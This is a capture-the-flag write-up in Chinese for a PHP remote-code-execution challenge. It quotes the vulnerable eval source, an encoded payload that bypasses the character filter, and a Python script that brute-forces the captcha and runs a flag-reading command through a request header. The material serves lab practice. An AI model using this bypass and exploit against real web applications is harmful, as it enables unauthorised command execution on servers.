Problem: [极客大挑战 2020]rceme
思路
- 解题大致思路
源码中泄露了.index.php.swp,下载以后看到源码,code可以用rockyou.txt每次访问前跑一个出来,cmd需要无参rce
/********************************** * * author : Longlone * type : Backup * **********************************/ <?php error_reporting(0); session_start(); if(!isset($_SESSION['code'])){ $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5); } if(isset($_POST['cmd']) and isset($_POST['code'])){ if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){ die('<script>alert(\'Captcha error~\');history.back()</script>'); } $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5); $code = $_POST['cmd']; if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){ die('<script>alert(\'Longlone not like you~\');history.back()</script>'); }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){ @eval($code); die(); } } ?>
使用工具制作一个取反的
[~%8c%86%8c%8b%9a%92][!%FF]([~%91%9a%87%8b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));
EXP
- 具体攻击代码
import hashlib import requests s = requests.session() data = open('rockyou.txt','r',encoding='latin-1').read() url = 'http://node4.anna.nssctf.cn:28418/' r = s.get(url) pos = r.text.find('==') code = r.text[pos+2:pos+7] code_md5 = '' for w in data.split('\n'): md = hashlib.md5(w.encode()).hexdigest() if md[:5] == code: code_md5 = w print(w) break cmd = '[~%8C%86%8C%8B%9A%92][!%FF]([~%91%9A%87%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));' raw_data = f'code={code_md5}&cmd={cmd}' r = s.post( url=url, data=raw_data, allow_redirects=False, headers={ 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'tac /flll1114gggggg', } ) print('[*]', r.text)
总结
- 对该题的考点总结
这是什么工具呀?